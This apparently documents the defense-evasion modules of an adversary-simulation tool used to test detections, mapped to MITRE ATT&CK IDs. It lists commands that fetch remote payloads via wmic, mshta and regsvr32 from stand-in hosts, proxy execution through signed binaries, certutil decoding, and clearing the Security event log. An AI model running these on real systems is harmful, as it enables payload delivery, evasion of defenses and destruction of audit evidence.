Defense Evasion
T1055.002 - Process Injection: Portable Executable Injection
This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread Win32 API functions to inject innocuous shellcode.
T1055.004 - Process Injection: Asynchronous Procedure Call
This module uses the CreateProcess, OpenProcess, VirtualAllocEx, WriteProcessMemory and QueueUserAPC Win32 API functions to inject innocuous shellcode.
T1220 - XSL Script Processing
This module uses the CreateProcess Win32 API to execute:
wmic.exe os get /FORMAT "http://webserver/payload.xsl"
Variation 1
This module uses the System.Diagnostics .NET namespace to delete the Security event log.
Variation 2
This module uses the CreateProcess Win32 API to execute a specific command:
wevtutil.exe cl Security
T1218.011 - Signed Binary Proxy Execution: Rundll32
This module uses the CreateProcess Win32 API to execute:
rundll32.exe C:\Windows\twain_64.dll
T1218.003 - Signed Binary Proxy Execution: CMSTP
This module uses the CreateProcess Win32 API to execute:
cmstp.exe /s /ns C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt
T1218.005 - Signed Binary Proxy Execution: Mshta
This module uses the CreateProcess Win32 API to execute:
mshta.exe http://webserver/payload.hta
T1140 - Deobfuscate/Decode Files or Information
This module uses the CreateProcess Win32 API to execute:
certutil.exe -decode encodedb64.txt decoded.exe
T1218.010 - Signed Binary Proxy Execution: Regsvr32
This module uses the CreateProcess Win32 API to execute:
regsvr32.exe /u /n /s /i:http://malicious.domain:8080/payload.sct scrobj.dll
T1218.009 - Signed Binary Proxy Execution: Regsvcs/Regasm
This module uses the CreateProcess Win32 API to execute:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U winword.dll